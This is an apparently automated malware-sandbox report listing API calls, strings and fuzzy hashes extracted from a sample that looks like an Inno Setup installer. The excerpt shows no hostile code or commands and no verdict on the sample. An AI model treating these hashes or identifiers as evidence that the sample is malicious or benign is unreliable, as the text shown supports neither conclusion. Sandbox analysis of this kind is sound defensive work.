                                                                                        • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                        • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                        • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                        • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                        Strings
                                                                                        • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                        • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                        • API String ID: 3850602802-3720027226
                                                                                        • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                        • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                        • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                        • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                        APIs
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • GetFocus.USER32 ref: 00478757
                                                                                        • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                        • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FocusMessageStateTextWaitWindow
                                                                                        • String ID: Wnd=$%x
                                                                                        • API String ID: 1381870634-2927251529
                                                                                        • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                        • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                        • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                        • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                        APIs
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$LocalSystem
                                                                                        • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                        • API String ID: 1748579591-1013271723
                                                                                        • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                        • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                        • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                        • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesDeleteErrorLastMove
                                                                                        • String ID: DeleteFile$MoveFile
                                                                                        • API String ID: 3024442154-139070271
                                                                                        • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                        • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                        • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                        • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                        • API String ID: 47109696-2631785700
                                                                                        • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                        • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                        • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                        • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                        • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                        Strings
                                                                                        • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                        • CSDVersion, xrefs: 00483BFC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                        • API String ID: 3677997916-1910633163
                                                                                        • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                        • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                        • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                        • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                        • API String ID: 1646373207-4063490227
                                                                                        • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                        • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                        • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                        • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                        • API String ID: 1646373207-260599015
                                                                                        • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                        • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                        • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                        • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: NotifyWinEvent$user32.dll
                                                                                        • API String ID: 1646373207-597752486
                                                                                        • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                        • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                        • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                        • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                        • API String ID: 1646373207-834958232
                                                                                        • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                        • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                        • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                        • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                        APIs
                                                                                          • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                        • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                        • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                        • API String ID: 2238633743-2683653824
                                                                                        • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                        • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                        • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                        • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                        • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                        • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                        • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                        • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                        APIs
                                                                                          • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                          • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                        • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountErrorFileLastMoveTick
                                                                                        • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                        • API String ID: 2406187244-2685451598
                                                                                        • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                        • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                        • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                        • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00413D46
                                                                                        • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                          • Part of subcall function 00418EC0: 6F59C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                          • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                        • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorDesktopWindow$Show
                                                                                        • String ID:
                                                                                        • API String ID: 2074268717-0
                                                                                        • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                        • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                        • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                        • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                        • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                        • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                        Memory Dump Source
